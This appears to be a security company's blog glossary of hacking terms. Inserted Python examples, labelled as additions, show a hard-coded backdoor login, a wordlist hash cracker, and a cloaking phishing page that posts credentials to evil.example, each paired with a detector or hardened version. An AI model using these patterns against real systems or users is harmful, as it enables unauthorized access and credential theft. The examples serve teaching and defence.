Speak the Language of Security: 20 Essential Hacking Terminologies

Knowing hacking terminologies forms a foundation for effective cybersecurity by making it easier to research security practices, understand attack methods, and develop defenses. We've compiled this guide as a reference for security newbies and seasoned professionals. In this blog, we'll cover 20 of the most common terms you're likely to encounter in cybersecurity discussions.

Backdoor Attacks

Backdoor attacks use a way around the authentication procedures designed to keep unauthorized users out of a system. The name comes from maintenance hooks, or "backdoors": features built into software so that maintenance personnel can bypass the normal authentication mechanism.

Backdoor vulnerabilities may stem from native system weaknesses, from entry points created maliciously, or from ones that developers accidentally leave open. For example, networking hardware often ships with default credentials intended to be changed after installation; if administrators never change them, attackers can simply log in with the documented defaults. Other backdoors arrive with downloaded malicious software whose code opens unauthorized access.
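The leftover maintenance hook described above, as an added example that is not part of the original post: a login routine with a hard-coded bypass credential beside its hardened form, plus a small static check that flags the pattern in source code. The user store, the salt and every credential here are constructed for illustration.

```python
"""Maintenance-hook backdoor: a hard-coded bypass beside its hardened form.

Added example, not from the original post. The user table, the salt and
all credentials are constructed; the bypass string is deliberately the
kind of thing a developer leaves in "for support".
"""
import ast
import hashlib
import hmac


def _pbkdf2(password: str, salt: bytes) -> bytes:
    # Slow, salted hash so offline guessing is expensive.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


_SALT = b"constructed-static-salt-for-demo"          # per-user salts in real code
USERS = {"alice": (_SALT, _pbkdf2("correct horse battery staple", _SALT))}


def _verify(username: str, password: str) -> bool:
    record = USERS.get(username)
    if record is None:
        _pbkdf2(password, _SALT)   # equal cost for unknown users (no user enumeration by timing)
        return False
    salt, expected = record
    return hmac.compare_digest(_pbkdf2(password, salt), expected)


def login_with_backdoor(username: str, password: str) -> bool:
    """Vulnerable: a maintenance hook accepts one fixed password for ANY
    account, so the real credential check never runs."""
    if password == "supp0rt-2019":           # the backdoor
        return True
    return _verify(username, password)


def login_hardened(username: str, password: str) -> bool:
    """Hardened: only the user store decides; no special-case credential."""
    return _verify(username, password)


def find_hardcoded_credential_checks(source: str) -> list:
    """Static check: line numbers where a password-like variable is compared
    against a string literal, which is what leftover maintenance hooks look like."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Compare):
            continue
        operands = [node.left, *node.comparators]
        names = {n.id.lower() for n in operands if isinstance(n, ast.Name)}
        literal = any(isinstance(n, ast.Constant) and isinstance(n.value, str) for n in operands)
        if literal and any(k in nm for nm in names for k in ("pass", "secret", "token", "key")):
            hits.append(node.lineno)
    return hits


if __name__ == "__main__":
    print("backdoor as unknown user:", login_with_backdoor("nobody", "supp0rt-2019"))
    print("hardened as unknown user:", login_hardened("nobody", "supp0rt-2019"))
```

The static check is deliberately crude (it ignores comparisons against environment variables or config lookups, which is where credentials belong), but a hit on a `== "..."` literal next to a password variable is worth a manual look in any code review.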

Brute Force Attacks

A brute-force attack is a trial-and-error method in which attackers guess credentials, encryption keys, or other secrets by systematically trying combinations until the correct one is found. There are different types of brute-force attacks. First, an attacker can run a large wordlist against a login page (online guessing). With the right tooling this credential guessing can be effective, especially against weak passwords, which is why login endpoints need rate limiting, lockout, or multi-factor authentication.

Second, an attacker who has obtained password hashes can attack them offline, where the only limit is the attacker's hardware. Password-cracking tools recover hashes routinely; however, password length and complexity, together with the choice of a slow, salted hashing function (bcrypt, scrypt, or Argon2 rather than unsalted MD5 or SHA-1), raise the cracking time to the point where an exhaustive search becomes computationally infeasible.

Published estimates put an 8-character password within reach of a GPU cracking rig in seconds against a fast hash, while a 16-character password from the same character set takes centuries; those figures depend entirely on the hash algorithm, the character set, and the hardware, so treat them as ratios rather than absolutes. Cracking hardware keeps improving, and quantum computing is often cited as the next game-changer. Headline claims of a quantum chip finishing in minutes a task that would take classical machines septillions of years refer to contrived sampling benchmarks, not password cracking; against hashes and symmetric keys, Grover's algorithm offers at most a quadratic speedup, which roughly halves the effective key length and is answered by longer secrets.
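The keyspace arithmetic and the offline attack described above, as an added example that is not part of the original post. The guess rates, the "leaked" hash and the wordlist are constructed; real rates vary by orders of magnitude with the hash algorithm and hardware, which is exactly the point the numbers make.

```python
"""Brute force: keyspace arithmetic and a wordlist attack on a stored hash.

Added example, not from the original post. Guess rates, the leaked hash and
the wordlist are constructed for illustration.
"""
import hashlib

SECONDS_PER_YEAR = 365.25 * 24 * 3600


def keyspace(charset_size: int, length: int) -> int:
    """Number of candidates in an exhaustive search of exactly `length` characters."""
    return charset_size ** length


def years_to_exhaust(charset_size: int, length: int, guesses_per_second: float) -> float:
    """Worst-case time to try every candidate at a given guess rate."""
    return keyspace(charset_size, length) / guesses_per_second / SECONDS_PER_YEAR


def wordlist_attack(target_hex: str, wordlist, algorithm: str = "sha256", salt: bytes = b""):
    """Offline attack: hash each candidate and compare with the stolen digest.
    Returns the recovered password, or None if the wordlist is exhausted."""
    for candidate in wordlist:
        digest = hashlib.new(algorithm, salt + candidate.encode()).hexdigest()
        if digest == target_hex:
            return candidate
    return None


# Constructed "leaked" credential: unsalted SHA-256 of a weak, seasonal password.
LEAKED_HASH = hashlib.sha256(b"Summer2024!").hexdigest()
WORDLIST = ["password", "123456", "Summer2023!", "Summer2024!", "letmein"]

if __name__ == "__main__":
    fast = 1e11   # assumed: GPU rig against a fast unsalted hash
    slow = 1e5    # assumed: same rig against a memory-hard KDF such as Argon2
    for length in (8, 12, 16):
        print(f"{length} chars from a 95-char set: "
              f"{years_to_exhaust(95, length, fast):.3g} years (fast hash), "
              f"{years_to_exhaust(95, length, slow):.3g} years (slow KDF)")
    print("recovered:", wordlist_attack(LEAKED_HASH, WORDLIST))
```

Two things the output makes visible: each extra character multiplies the search space by the charset size, so length dominates complexity rules; and a slow KDF shifts every row by the same factor (here a million), which is the defender's lever when users will not pick 16-character passwords.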

Cloaking

Cloaking attacks attempt to conceal malicious code from human users or security software. Code can be hidden through various methods, including embedding it in legitimate applications, making it too complex for security scans to easily spot, only transmitting it to users who meet certain criteria, or encrypting it. 

A malicious example of cloaking could come from a phishing website that displays different versions of the site’s content to different users. For example, a security scanner may see a valid and harmless version of the website. On the other hand, potential target users of the phishing attack could be shown the malicious version of content to entice them to engage with the phishing attack. 
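The scanner-versus-victim behaviour described above, as an added example that is not part of the original post: a server function that cloaks on user agent, source address and referrer, and a detector that fetches the same URL under several client profiles and groups the responses by digest. The cloaking rules, IP ranges and page bodies are constructed; a real detector would issue the HTTP requests itself.

```python
"""Cloaking: attacker-side logic beside a multi-profile detector.

Added example, not from the original post. Scanner markers, IP prefixes,
profiles and page contents are constructed for illustration.
"""
import hashlib

SCANNER_UA_MARKERS = ("googlebot", "bingbot", "virustotal", "urlscan", "python-requests", "curl")
CRAWLER_IP_PREFIXES = ("66.249.",)      # constructed: pretend search-engine crawler range

BENIGN_PAGE = "<html><body>Welcome to our parcel-tracking portal.</body></html>"
PHISHING_PAGE = ('<html><body><form action="https://evil.example/collect" method="post">'
                 "Enter your password to release your parcel</form></body></html>")


def cloaked_server(request: dict) -> str:
    """Attacker-side logic: scanners and crawlers get a harmless page; only a
    browser arriving from the lure email is shown the credential form."""
    ua = request.get("user_agent", "").lower()
    ip = request.get("ip", "")
    if any(m in ua for m in SCANNER_UA_MARKERS) or ip.startswith(CRAWLER_IP_PREFIXES):
        return BENIGN_PAGE
    if request.get("referer", "").startswith("https://mail.example/"):
        return PHISHING_PAGE
    return BENIGN_PAGE


# Constructed client profiles a detector would try.
PROFILES = {
    "crawler": {"user_agent": "Googlebot/2.1", "ip": "66.249.64.1", "referer": ""},
    "scanner": {"user_agent": "python-requests/2.31", "ip": "203.0.113.5", "referer": ""},
    "victim": {"user_agent": "Mozilla/5.0 (Windows NT 10.0) Chrome/120", "ip": "198.51.100.7",
               "referer": "https://mail.example/inbox"},
}


def detect_cloaking(fetch, profiles: dict) -> dict:
    """Fetch under every profile and group profile names by response digest.
    More than one distinct digest means the site serves different content to
    different clients, i.e. it is cloaking."""
    by_digest = {}
    for name, req in profiles.items():
        digest = hashlib.sha256(fetch(req).encode()).hexdigest()[:12]
        by_digest.setdefault(digest, []).append(name)
    return {"cloaked": len(by_digest) > 1, "groups": by_digest}


if __name__ == "__main__":
    print(detect_cloaking(cloaked_server, PROFILES))
```

The practical lesson for anyone triaging a reported URL: fetch it the way the victim would (their user agent, their referrer, ideally their network egress), not just from a scanner, and compare the results.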

Denial of service (DoS)

Denial-of-Service (DoS) attacks disrupt online services by overwhelming them with traffic or exploiting vulnerabilities, preventing legitimate users from accessing them. DoS attacks fall into two main categories: network-level and application-level.

Network-level attacks target infrastructure and protocols. Common examples include SYN floods, which overwhelm server connection queues, and UDP floods, which saturate network bandwidth. Amplification attacks, like DNS amplification, leverage third-party servers to magnify attack traffic.

Application-level attacks target specific services. HTTP floods bombard web servers with expensive requests, while slowloris-style attacks hold many connections open by sending partial requests very slowly, exhausting the server's connection pool with very little bandwidth. 
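One standard defence against the application-level flood described above, as an added example that is not part of the original post: a per-client token bucket replayed over a constructed request timeline containing one normal user and one flooder. The rate, burst size and timeline are assumptions; in production this sits in the proxy or middleware, and network-level floods are dealt with earlier, at the edge.

```python
"""Application-level DoS: a per-client token bucket sheds an HTTP flood
while a legitimate client is unaffected.

Added example, not from the original post. The request timeline and the
limits are constructed for illustration.
"""
from collections import defaultdict


class TokenBucket:
    """Each client may burst up to `capacity` requests, then sustain `rate` per second."""

    def __init__(self, rate: float, capacity: int):
        self.rate, self.capacity = rate, capacity
        self.tokens = defaultdict(lambda: float(capacity))
        self.last = {}

    def allow(self, client: str, now: float) -> bool:
        elapsed = now - self.last.get(client, now)
        self.last[client] = now
        # Refill in proportion to elapsed time, never beyond capacity.
        self.tokens[client] = min(self.capacity, self.tokens[client] + elapsed * self.rate)
        if self.tokens[client] >= 1:
            self.tokens[client] -= 1
            return True
        return False


def replay(requests, rate: float = 5.0, capacity: int = 10) -> dict:
    """Run a (timestamp, client_ip) sequence through the limiter and count
    accepted versus rejected requests per client."""
    bucket = TokenBucket(rate, capacity)
    stats = defaultdict(lambda: {"accepted": 0, "rejected": 0})
    for ts, ip in requests:
        key = "accepted" if bucket.allow(ip, ts) else "rejected"
        stats[ip][key] += 1
    return dict(stats)


# Constructed timeline: a normal user at 2 req/s and a flooder at 500 req/s, both for 10 s.
NORMAL = [(i / 2, "198.51.100.7") for i in range(20)]
FLOOD = [(i / 500, "203.0.113.9") for i in range(5000)]
TIMELINE = sorted(NORMAL + FLOOD)

if __name__ == "__main__":
    for ip, counts in replay(TIMELINE).items():
        print(ip, counts)
```

The flooder gets its initial burst of 10 and then about 5 requests per second, so roughly 60 of its 5,000 requests reach the application; the normal user is never throttled. Keying on source IP alone is weak against a distributed attack, which is why real deployments also key on session, API token, or request cost.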

While not a DoS attack itself, a buffer overflow is a vulnerability that can cause a service to crash, leading to denial of service. It occurs when a program writes data beyond allocated memory, potentially corrupting it. While DoS can be a consequence, buffer overflows can also have more severe impacts, like remote code execution.

Logic bomb

Logic bombs are malicious code embedded in software and designed to trigger harmful actions when certain conditions are met. For example, the code may contain instructions to copy and exfiltrate files, delete files, encrypt files, open communications to remote servers, or install other malicious software. After insertion, logic bombs remain dormant until their trigger condition is met. Triggers may be system events, user actions, the expiration of a deadline, or specified combinations of conditions. Logic bombs may be delivered through malicious software or planted by insiders, such as a departing employee who leaves code that fires after their account is deactivated.

Malware

Malicious software or malware includes any type of software used by hackers to allow unauthorized access to networks or devices, steal data, disrupt service, or destroy systems or data. Malware comes in a growing number of common varieties, including:

  • Viruses attach themselves to host files and replicate by infecting other files.
  • Worms install themselves and replicate without requiring host files.
  • Ransomware encrypts data on the victim's device or network, threatening to withhold the decryption key or leak the data unless an extortion fee is paid.
  • Wipers erase files on infected devices.
  • Spyware gathers information from the target.
  • Keyloggers record keystrokes on the victim's device.
  • Adware presents unwanted ads to the user and may contain code that executes other malicious actions.
  • Rogue software displays a fake virus alert to trick the user into performing actions that install other malicious code, initiate identity theft, or create other security issues.

Man in the Middle (MITM) Attacks

Man-in-the-middle attacks covertly insert an attacker into the connection between two parties so that the intruder can eavesdrop on the traffic or alter its content. The attacker becomes the relay point between the two ends of the conversation, impersonating each endpoint to the other. A MITM position is first obtained by some other means, such as ARP spoofing on a local network, a rogue Wi-Fi access point, a compromised router, or breaking weak network encryption. Once inside the stream, MITM attackers may exploit their position by forging packet source addresses (IP spoofing), redirecting users to other hosts with false name-resolution answers (DNS spoofing), or sending visitors to phony websites (HTTP/HTTPS spoofing, typically via a look-alike domain or a certificate the victim is tricked into accepting). Properly validated TLS keeps the content confidential and unmodified even when the attacker controls the network path, which is why certificate-validation warnings should never be clicked through.

Payload

In a cybersecurity context, a payload is the part of a malware package that contains the malicious code. A complete malware package also includes the means of installing the malicious code, known as the infection mechanism, and the code for activating the payload, known as the trigger. For example, a virus payload may be accompanied by a search routine for locating and infecting files and a logic bomb that activates the virus if a certain type of file is detected.

Ransomware

Ransomware is a type of malware that encrypts data on the target device or network and threatens to delete or leak the data unless the victim pays an extortion fee. Criminals use ransomware to target businesses, government agencies, and non-governmental organizations (NGOs). Ransomware attacks occur after the perpetrator has used some other hacking method to deliver malware to the victim. Attackers spread ransomware files through means such as phishing, email attachments, adware, infected websites, pirated software, or by exploiting known vulnerabilities.

Remote Access Trojans (RATs)

Remote access trojans are malicious files that resemble normal files and contain code that gives attackers full control over the targeted device. RATs are malicious variants of remote desktop software, used for legitimate purposes such as tech support to enable a remote user to control a local device. Hackers install RATs on target devices using methods such as phishing, email attachments, phony websites, and infected software-sharing sites. Once installed, a RAT enables the attacker to use the target device as if it were their own. The attacker can copy files, delete data, send messages, install other malware, or use the device to launch attacks on other devices and make it appear as if the victim was the perpetrator.

Rootkit

Rootkits are malicious software packages designed to give attackers access to privileged areas of devices or software, such as system administrator accounts, or to alter systems to conceal the presence of other malware. A rootkit may provide attackers with backdoor access to devices, install other malware, or enable the infected devices to be used to attack other devices. Attackers may install rootkits through means such as backdoors, infected file downloads, or malware attachments. 

Once installed, rootkits evade detection by altering the operating system itself, for example by hooking system calls so that their files and processes are omitted from directory listings and process tables, or by disabling event logging so that no evidence of the attack is recorded. Rootkits are notoriously difficult to remove: because of their deep integration with the system, and because a compromised system cannot be trusted to report on itself, remediation usually means wiping the device and reinstalling from trusted media (a full factory reset), or reflashing firmware in the case of firmware-level rootkits.
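The "a compromised system cannot be trusted to report on itself" point is what cross-view detection exploits, shown here as an added example that is not part of the original post: the same fact (the set of running processes) is collected from two independent sources and the views are diffed. The comparison function is exercised on constructed lists; `live_views()` is the Linux-only version that reads `/proc` and runs `ps`, and a hook in one path but not the other shows up as a PID present in only one view.

```python
"""Rootkit hunting by cross-view comparison of the process list.

Added example, not from the original post. The constructed views model a
user-mode rootkit that hooks the libc directory-listing calls used by `ps`
but cannot hide from a direct /proc walk. Kernel-level rootkits can hide
from both views, in which case the comparison must be made against an
offline image or from outside the host.
"""
import os
import subprocess


def pids_from_proc(entries) -> set:
    """Numeric directory names under /proc are live PIDs; the rest are files and symlinks."""
    return {int(name) for name in entries if name.isdigit()}


def pids_from_ps(ps_output: str) -> set:
    """Parse `ps -eo pid=` output (one PID per line, no header)."""
    return {int(tok) for tok in ps_output.split() if tok.isdigit()}


def cross_view_diff(view_a: set, view_b: set) -> dict:
    """PIDs present in one view but absent from the other."""
    return {"hidden_from_b": sorted(view_a - view_b), "hidden_from_a": sorted(view_b - view_a)}


def live_views() -> dict:
    """Collect both views on a Linux host. Short-lived processes can appear in
    one view and not the other purely by timing, so repeat and intersect
    the results before treating a PID as hidden."""
    proc = pids_from_proc(os.listdir("/proc"))
    ps = pids_from_ps(subprocess.run(["ps", "-eo", "pid="], capture_output=True, text=True).stdout)
    return cross_view_diff(proc, ps)


# Constructed views: /proc shows PID 4242 that the hooked ps binary omits.
PROC_VIEW = ["1", "2", "4242", "900", "self", "cpuinfo", "meminfo"]
PS_VIEW = "    1\n    2\n  900\n"

if __name__ == "__main__":
    print("constructed:", cross_view_diff(pids_from_proc(PROC_VIEW), pids_from_ps(PS_VIEW)))
    if os.path.isdir("/proc"):
        print("live:", live_views())
```

Anything reported under `hidden_from_b` on a real host deserves a look at `/proc/<pid>/exe` and `/proc/<pid>/maps` from a trusted environment; if that PID also resists inspection, assume the kernel is compromised and move the investigation off-box.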

Social Engineering

Social engineering manipulates human users into performing compromising actions. A social engineering attack may seek to trick the victim into opening an infected file, visiting a malicious website, providing sensitive information, or authorizing a fraudulent payment. Social engineering attacks rely on deception and emotional manipulation. Attackers may impersonate trusted sources, offer targets fictitious financial opportunities, or scare victims with phony security alerts. Social engineering attacks may set the stage for other types of hacking attacks.

Phishing

Phishing attacks use communications from senders impersonating legitimate parties to lure recipients into taking compromising actions. For example, a sender may impersonate the recipient's credit card provider in an attempt to trick them into entering their credentials on a fake login page. Phishing attacks are commonly sent through email or chat, and they often create a feeling of urgency to exploit people's tendency to act quickly. They may target specific individuals or organizations (spear phishing), high-value targets (whaling), or contacts of compromised business email accounts (business email compromise or BEC).
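A first-pass triage of the impersonation and urgency signals described above, as an added example that is not part of the original post: it parses a raw email and reports header-domain mismatches, a look-alike sender domain, urgency wording, and link text whose displayed URL does not match its real target. The message, the trusted-domain list and the indicator rules are constructed; this is a triage aid, not a complete detector.

```python
"""Phishing triage: score a raw email for common impersonation indicators.

Added example, not from the original post. The sample message, the trusted
domain and the keyword list are constructed for illustration.
"""
import email
import re
from email import policy
from urllib.parse import urlparse

TRUSTED_DOMAINS = {"examplebank.com"}            # constructed: the brand being impersonated
URGENCY = re.compile(r"\b(immediately|within 24 hours|suspended|verify now|urgent)\b", re.I)
ANCHOR = re.compile(r'<a\s+href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)


def domain_of(addr: str) -> str:
    """Domain part of a From/Reply-To/Return-Path value, display name and brackets removed."""
    _, _, dom = addr.rpartition("@")
    return dom.strip("<> ").lower()


def looks_alike(domain: str, trusted: set) -> bool:
    """Cheap look-alike test: the trusted name embedded in another domain
    (secure-examplebank.com) or differing by one character (examp1ebank.com)."""
    for t in trusted:
        if domain == t:
            return False
        base = t.split(".")[0]
        if base in domain:
            return True
        d = domain.split(".")[0]
        if len(d) == len(base) and sum(a != b for a, b in zip(d, base)) == 1:
            return True
    return False


def phishing_indicators(raw: bytes) -> list:
    """Return human-readable indicators found in the message (empty list = none)."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    hits = []
    from_dom = domain_of(msg["From"] or "")
    ret_dom = domain_of(msg["Return-Path"] or "")
    reply_dom = domain_of(msg["Reply-To"] or "")
    if ret_dom and ret_dom != from_dom:
        hits.append(f"return-path domain {ret_dom} != from domain {from_dom}")
    if reply_dom and reply_dom != from_dom:
        hits.append(f"reply-to domain {reply_dom} != from domain {from_dom}")
    if looks_alike(from_dom, TRUSTED_DOMAINS):
        hits.append(f"look-alike sender domain {from_dom}")
    body = msg.get_body(preferencelist=("html", "plain")).get_content()
    if URGENCY.search(body):
        hits.append("urgency language in body")
    for href, text in ANCHOR.findall(body):
        shown = re.sub(r"<[^>]+>", "", text).strip()
        if shown.startswith("http") and urlparse(shown).netloc != urlparse(href).netloc:
            hits.append(f"link text {shown} actually points to {urlparse(href).netloc}")
    return hits


# Constructed lure: look-alike domain (digit 1 for letter l), mismatched bounce
# address, urgency, and a displayed URL that differs from the real link target.
SAMPLE = b"""From: "ExampleBank Security" <alerts@examp1ebank.com>
Return-Path: <bounce@mailer-hosting.example>
Reply-To: <support@examp1ebank.com>
To: victim@example.org
Subject: Your account will be suspended
Content-Type: text/html; charset=utf-8

<p>Your account will be suspended within 24 hours. Verify now:</p>
<a href="https://login.examp1ebank.com/verify">https://www.examplebank.com/secure</a>
"""

if __name__ == "__main__":
    for hit in phishing_indicators(SAMPLE):
        print("-", hit)
```

None of these indicators is conclusive on its own (marketing platforms legitimately produce Return-Path mismatches), which is why the function returns the list rather than a verdict; combine it with SPF/DKIM/DMARC results from the `Authentication-Results` header before acting.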

Spear Phishing 

Beyond general phishing attacks, malicious actors employ more targeted strategies. Spear phishing focuses on specific individuals or organizations, crafting personalized messages that appear highly relevant to the recipient. For instance, an attacker might impersonate a colleague, referencing shared projects and internal terminology, to trick the target into sharing sensitive data or clicking a malicious link. This tailored approach increases the likelihood of success by exploiting the recipient's trust and familiarity.

Whaling 

Whaling takes the targeted approach of spear phishing further, concentrating on high-value organizational targets, such as executives or senior managers. These individuals often possess greater access to sensitive information and financial resources. An attacker might impersonate a trusted business partner or legal counsel, using sophisticated language and detailed knowledge of the target's activities, to persuade them to authorize fraudulent transactions.

Deep Fakes

The emergence of deepfakes introduces a new dimension to phishing and social engineering. Deepfakes utilize artificial intelligence to create highly realistic manipulated videos or audio recordings. For example, an attacker could generate a deepfake video of a CEO instructing employees to transfer funds to a fraudulent account. This sophisticated form of deception can bypass traditional security measures and erode trust in digital communications, making it increasingly difficult to distinguish between authentic and manipulated content.

Spam

Spam attacks target victims with unsolicited messages, equivalent to digital junk mail. Attackers may use spam to promote marketing campaigns or to deliver phishing or malware attacks. Spam messages may be sent through email, texts, phone calls, or social media. To reduce spam, regulatory authorities have mandated requirements for mass marketing campaigns to obtain permission from recipients before sending emails, sending texts, or making phone calls. Criminals bypass these regulations by means such as purchasing email lists from third parties or using databases of stolen contact information.

Visual Hacking

Visual hacking or shoulder surfing steals information from the target by physically looking at their screen or documents containing sensitive information. Visual hackers may position themselves in offices, Wi-Fi hotspots, or public transportation. They also may use hidden cameras to view devices remotely.

White Hat

A white hat or ethical hacker is an authorized party who uses hacking techniques for helpful purposes. For example, penetration testers (pentesters) are authorized by businesses to simulate attacks on networks in order to identify security vulnerabilities and develop mitigation strategies. White hats stand in contrast to black hats, who hack networks for malicious purposes, and gray hats, who may hack networks for non-malicious purposes without lawful authorization, for purposes such as testing their own hacking skills or convincing security teams to hire them.

Zero-day attack

Zero-day attacks exploit security vulnerabilities that are unknown to the software vendor and to defenders but already known to attackers. The flaw itself is the zero-day vulnerability; code that takes advantage of it is a zero-day exploit. Such vulnerabilities can remain undetected for varying lengths of time, from a few days to several months or even years. To limit the window of widespread exploitation, researchers and security teams often withhold public details of a vulnerability until a patch is available, particularly when the flaw resides in third-party software that requires an external fix.

Once attackers begin exploiting a vulnerability in the wild, a race begins: malicious actors try to exploit the flaw as widely as possible while the vendor works to develop and ship a patch. Producing a tested fix often takes days or weeks; samples of the active attacks can provide valuable clues about the root cause that accelerate the patching process, and until the patch ships, defenders rely on workarounds such as disabling the affected feature or adding detection for the observed exploit behaviour.

Improve Security Posture with Cobalt Pentesting

The array of hacking terminology continues to expand every year as attack methods continue to multiply. To counter all the weapons available to attackers, you need offensive security testing that covers all known attack methods and all attack surfaces in your network.

Cobalt penetration testing provides you with comprehensive expert insight into your entire network's vulnerabilities to all forms of attack. Our carefully vetted core of expert pentesters represents the top 5% of the global pentesting community, working with industry leaders such as the Open Worldwide Application Security Project (OWASP) to develop and maintain cutting-edge security standards. 

We're familiar with today's most prevalent attack methods and conduct all pentests with industry-standard methodologies. Contact us to discuss how we can help you implement comprehensive security defenses against today's full array of hacking methods.

About Gisela Hinojosa
Gisela Hinojosa is a Senior Security Consultant at Cobalt with over 5 years of experience as a penetration tester. Gisela performs a wide range of penetration tests, including network, web application, mobile application, Internet of Things (IoT), red teaming, phishing, and threat modeling with STRIDE. Gisela currently holds the Security+, GMOB, GPEN and GPWAT certifications.